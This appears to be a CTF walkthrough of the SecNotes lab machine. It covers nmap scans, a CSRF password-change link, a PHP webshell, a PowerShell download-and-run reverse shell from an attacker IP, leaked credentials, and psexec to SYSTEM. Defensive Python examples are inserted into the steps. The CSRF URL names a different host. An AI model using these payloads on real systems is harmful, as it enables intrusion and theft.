SecNotes

Enumeration
As always, we start with the enumeration phase, in which we scan the machine for open ports and then identify the services and versions running on them.
The following nmap command scans the target machine for open ports quickly and saves the output to a file:
nmap -sS --min-rate 5000 -p- -T5 -Pn -n 10.10.10.97 -oN allPorts
-sS
use the TCP SYN scan option. This scan option is relatively unobtrusive and stealthy, since it never completes TCP connections.
--min-rate 5000
nmap will try to keep the sending rate at or above 5000 packets per second.
-p-
scan the entire port range, from 1 to 65535.
-T5
insane mode, the fastest of nmap's timing templates.
-Pn
assume the host is online (skip host discovery).
-n
scan without reverse DNS resolution.
-oN
save the scan result into a file, in this case the allPorts file.
# Nmap 7.92 scan initiated Wed May 18 21:07:21 2022 as: nmap -sS -p- -n -Pn -oN allPorts 10.10.10.97
Nmap scan report for 10.10.10.97
Host is up (0.046s latency).
Not shown: 65532 filtered tcp ports (no-response)
PORT STATE SERVICE
80/tcp open http
445/tcp open microsoft-ds
8808/tcp open ssports-bcast
# Nmap done at Wed May 18 21:09:39 2022 -- 1 IP address (1 host up) scanned in 138.01 seconds
Now that we know which ports are open, let's find out the services and versions running on them. The following command scans these ports in more depth and saves the result to a file:
nmap -sC -sV -p80,445,8808 10.10.10.97 -oN targeted
-sC
performs the scan using the default set of scripts.
-sV
enables version detection.
-oN
save the scan result into a file, in this case the targeted file.
# Nmap 7.92 scan initiated Wed May 18 21:14:15 2022 as: nmap -sCV -p80,445,8808 -Pn -oN targeted 10.10.10.97
Nmap scan report for 10.10.10.97
Host is up (0.27s latency).
PORT STATE SERVICE VERSION
80/tcp open http Microsoft IIS httpd 10.0
|_http-server-header: Microsoft-IIS/10.0
| http-title: Secure Notes - Login
|_Requested resource was login.php
| http-methods:
|_ Potentially risky methods: TRACE
445/tcp open microsoft-ds Windows 10 Enterprise 17134 microsoft-ds (workgroup: HTB)
8808/tcp open http Microsoft IIS httpd 10.0
|_http-server-header: Microsoft-IIS/10.0
|_http-title: IIS Windows
| http-methods:
|_ Potentially risky methods: TRACE
Service Info: Host: SECNOTES; OS: Windows; CPE: cpe:/o:microsoft:windows
Host script results:
| smb2-security-mode:
| 3.1.1:
|_ Message signing enabled but not required
|_clock-skew: mean: 2h20m02s, deviation: 4h02m29s, median: 2s
| smb2-time:
| date: 2022-05-18T19:14:35
|_ start_date: N/A
| smb-security-mode:
| account_used: <blank>
| authentication_level: user
| challenge_response: supported
|_ message_signing: disabled (dangerous, but default)
| smb-os-discovery:
| OS: Windows 10 Enterprise 17134 (Windows 10 Enterprise 6.3)
| OS CPE: cpe:/o:microsoft:windows_10::-
| Computer name: SECNOTES
| NetBIOS computer name: SECNOTES\x00
| Workgroup: HTB\x00
|_ System time: 2022-05-18T12:14:32-07:00
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Wed May 18 21:15:10 2022 -- 1 IP address (1 host up) scanned in 55.27 seconds
Exploitation
If we take a look at the website, we'll see a login page where we can also sign up.

Let's create a new user named alfa8sa with the password alfa8sa.

Then, log in with the new user.

We'll see four options: create a new note, change our password, sign out, or contact the website owners. There is also a message that reveals the tyler@secnotes.htb user.

Let's try to change our password to alfa9sa.

Before hitting submit, let's set up Burp Suite and intercept the request.

Let's try to change the request method from POST to GET.

If the website still changes the password, we could send this URL to the tyler user, and if he opens it, his password will be changed to alfa9sa. Let's forward the request and see whether it changes our password.

And we see that the password has been changed: the endpoint accepts GET and has no anti-CSRF protection. Now we could send the following URL to tyler, so that if he opens it, his password will change to alfa9sa.
http://passage.htb/change_pass.php?password=alfa9sa&confirm_password=alfa9sa&submit=submit
Let's press the Contact Us button and send the URL.

Now, let's sign out and try to log in as the user tyler with the password alfa9sa.

And we should be able to log in.
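The password-change flaw above (the endpoint honours GET, checks no anti-CSRF token and never asks for the current password) next to a hardened version of the same handler. This is an added example written in Python to model the PHP endpoint's logic; the in-memory user store, the session dict and the function names are assumptions, not the site's code.

```python
import hashlib
import hmac
import secrets

# Toy in-memory user store and session standing in for the site's database and
# PHP $_SESSION (constructed for this example; not SecNotes' code).
def hash_pw(password, salt):
    return hashlib.pbkdf2_hmac("sha256", password.encode(), salt, 100_000)

def make_user(password):
    salt = secrets.token_bytes(16)
    return salt, hash_pw(password, salt)

def verify_pw(record, password):
    salt, digest = record
    return hmac.compare_digest(hash_pw(password, salt), digest)

def new_session(user):
    return {"user": user, "csrf_token": secrets.token_hex(32)}

def change_pass_vulnerable(method, params, session, users):
    """What change_pass.php did on the box: any method, no token, no current password.
    A link such as ?password=x&confirm_password=x&submit=submit is enough."""
    new = params.get("password", "")
    if new and new == params.get("confirm_password"):
        users[session["user"]] = make_user(new)
        return 200
    return 400

def change_pass_hardened(method, params, session, users):
    """Same endpoint with the checks that defeat the link-in-the-contact-form trick."""
    if method != "POST":                                   # no state change on GET
        return 405
    if not hmac.compare_digest(params.get("csrf_token", ""),
                               session["csrf_token"]):     # token bound to the session
        return 403
    if not verify_pw(users[session["user"]],
                     params.get("current_password", "")):  # prove the current password
        return 403
    new = params.get("password", "")
    if len(new) < 12 or new != params.get("confirm_password"):
        return 400
    users[session["user"]] = make_user(new)
    session["csrf_token"] = secrets.token_hex(32)          # rotate after a state change
    return 200
```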

There are three notes. The one called New Site contains a share name and some credentials.

Let's try to access it.
smbclient -U 'tyler%92g!mA8BGjOirkL%OG*&' //secnotes.htb/new-site
-U
username and password, separated by "%".
Try "help" to get a list of possible commands.
smb: \> ls
. D 0 Sun Aug 19 20:06:14 2018
.. D 0 Sun Aug 19 20:06:14 2018
iisstart.htm A 696 Thu Jun 21 17:26:03 2018
iisstart.png A 98757 Thu Jun 21 17:26:03 2018
7736063 blocks of size 4096. 3397922 blocks available
There are two files, which seem to belong to an IIS website. We saw in the nmap scan that there was another web server on port 8808.

We could try to upload a webshell to the share, which appears to be the web root of that IIS site, and then access the webshell from the browser. First, create a new file called webshell.php with the following content.
<?php
echo "<pre>" . shell_exec($_GET['cmd']) . "</pre>";
?>
And then upload it to the Samba share.
smb: \> put webshell.php
putting file webshell.php as \webshell.php (0.0 kb/s) (average 0.0 kb/s)
Then, we could execute commands by passing them in the cmd parameter of the following URL.
http://10.10.10.97:8808/webshell.php?cmd=whoami

Time to get a reverse shell. First, we'll have to copy the Invoke-PowerShellTcp.ps1 file from Nishang to our current directory, keeping its name so the URL below matches.
cp /opt/nishang/Shells/Invoke-PowerShellTcp.ps1 .
Then, open it and append the following line to the end of the file.
Invoke-PowerShellTcp -Reverse -IPAddress 10.10.14.7 -Port 4444
Now, start an HTTP server with Python to serve the current directory.
python -m http.server 80
Finally, let's start a netcat listener on port 4444.
rlwrap nc -lvnp 4444
-l
listen mode.
-v
verbose mode.
-n
numeric-only IP addresses, no DNS resolution.
-p
specify the port to listen on.
If we now access the following URL, the machine will download the Invoke-PowerShellTcp.ps1 file from our machine and send us a reverse shell as the tyler user. Then we can grab the user flag.
http://10.10.10.97:8808/webshell.php?cmd=powershell "IEX (New-Object Net.WebClient).DownloadString('http://10.10.14.7/Invoke-PowerShellTcp.ps1')"
listening on [any] 4444 ...
connect to [10.10.14.7] from (UNKNOWN) [10.10.10.97] 51465
Windows PowerShell running as user SECNOTES$ on SECNOTES
Copyright (C) 2015 Microsoft Corporation. All rights reserved.
whoami
secnotes\tyler
type \users\tyler\desktop\user.txt
fde104ffb6c4f8610383d039a9182470
Privilege Escalation
If we take a look at the desktop of the user tyler, we'll see a shortcut named bash.lnk, which means that bash is probably installed on the system.
dir \users\tyler\desktop
Directory: C:\users\tyler\desktop
Mode LastWriteTime Length Name
---- ------------- ------ ----
-a---- 6/22/2018 3:09 AM 1293 bash.lnk
-a---- 8/2/2021 3:32 AM 1210 Command Prompt.lnk
-a---- 4/11/2018 4:34 PM 407 File Explorer.lnk
-a---- 6/21/2018 5:50 PM 1417 Microsoft Edge.lnk
-a---- 6/21/2018 9:17 AM 1110 Notepad++.lnk
-ar--- 5/19/2022 7:25 AM 34 user.txt
-a---- 8/19/2018 10:59 AM 2494 Windows PowerShell.lnk
If we run the whoami command through bash, we'll see that we are the root user.
bash -c "whoami"
root
Let's see if the root flag is inside the /root directory.
bash -c "ls -la /root"
total 8
drwx------ 1 root root 512 Jun 22 2018 .
drwxr-xr-x 1 root root 512 Jun 21 2018 ..
---------- 1 root root 398 Jun 22 2018 .bash_history
-rw-r--r-- 1 root root 3112 Jun 22 2018 .bashrc
-rw-r--r-- 1 root root 148 Aug 17 2015 .profile
drwxrwxrwx 1 root root 512 Jun 22 2018 filesystem
There is no flag, but we see a .bash_history file with some content. Let's see what's in it.
bash -c "cat /root/.bash_history"
cd /mnt/c/
ls
cd Users/
cd /
cd ~
ls
pwd
mkdir filesystem
mount //127.0.0.1/c$ filesystem/
sudo apt install cifs-utils
mount //127.0.0.1/c$ filesystem/
mount //127.0.0.1/c$ filesystem/ -o user=administrator
cat /proc/filesystems
sudo modprobe cifs
smbclient
apt install smbclient
smbclient
smbclient -U 'administrator%u6!4ZwgwOM#^OBf#Nwnh' \\\\127.0.0.1\\c$
> .bash_history
less .bash_history
exit
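The .bash_history above is how the administrator password leaked: it was typed on the command line. As an added example (not from the box or this write-up), this Python scanner flags history lines that carry a secret in the same shapes seen here (smbclient -U 'user%pass', mount -o password=) plus a couple of common relatives, and masks the secret so the finding can be reported; the sample history and its placeholder password are constructed.

```python
import re
from typing import Iterable

# Command-line credential shapes. The first two are exactly what the history on this
# box contained (smbclient -U 'user%pass', mount -o ...); the rest are common
# relatives. Each regex captures the secret in a group named "secret".
PATTERNS = [
    ("smbclient -U user%pass",
     re.compile(r"\bsmbclient\b.*?\s-U\s+['\"]?[^'\"\s%]+%(?P<secret>[^'\"\s]+)")),
    ("mount -o pass=/password=",
     re.compile(r"\bmount\b.*?\s-o\s+\S*?\bpass(?:word)?=(?P<secret>[^,\s'\"]+)")),
    ("curl/wget -u user:pass",
     re.compile(r"\b(?:curl|wget)\b.*?\s(?:-u|--user)[ =]['\"]?[^'\"\s:]+:(?P<secret>[^'\"\s]+)")),
    ("sshpass -p pass",
     re.compile(r"\bsshpass\b.*?\s-p\s*['\"]?(?P<secret>[^'\"\s]+)")),
]

def scan_history(lines: Iterable[str]):
    """Yield (line_no, label, redacted_line) for each history line carrying a secret
    on the command line; the secret is masked so the finding can be reported."""
    for no, line in enumerate(lines, 1):
        for label, rx in PATTERNS:
            m = rx.search(line)
            if m:
                yield no, label, line.replace(m.group("secret"), "<redacted>")
                break

# Constructed sample mirroring the history recovered from /root on the box, with a
# placeholder in place of the real password.
SAMPLE_HISTORY = """\
cd /mnt/c/
mkdir filesystem
mount //127.0.0.1/c$ filesystem/ -o user=administrator
mount //127.0.0.1/c$ filesystem/ -o user=administrator,password=Pl4ceholder!
sudo modprobe cifs
smbclient -U 'administrator%Pl4ceholder!' //127.0.0.1/c$
less .bash_history
exit""".splitlines()

if __name__ == "__main__":
    for no, label, redacted in scan_history(SAMPLE_HISTORY):
        print(f"line {no}: {label}: {redacted}")
```

A line that only names the user (mount -o user=administrator) is not reported, since it carries no secret.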
We get the administrator credentials. Let's get a shell as the nt authority\system user on the machine with the psexec utility from Impacket. Then, all we have to do is reap the harvest and take the root flag.
impacket-psexec administrator:'u6!4ZwgwOM#^OBf#Nwnh'@10.10.10.97
Impacket v0.9.25.dev1+20220218.140931.6042675a - Copyright 2021 SecureAuth Corporation
[*] Requesting shares on 10.10.10.97.....
[*] Found writable share ADMIN$
[*] Uploading file pCRSiJqK.exe
[*] Opening SVCManager on 10.10.10.97.....
[*] Creating service bIED on 10.10.10.97.....
[*] Starting service bIED.....
[!] Press help for extra shell commands
Microsoft Windows [Version 10.0.17134.228]
(c) 2018 Microsoft Corporation. All rights reserved.
C:\WINDOWS\system32> whoami
nt authority\system
C:\WINDOWS\system32> type \users\administrator\desktop\root.txt
b05c9c122675dfcc403df0a8c75d29b9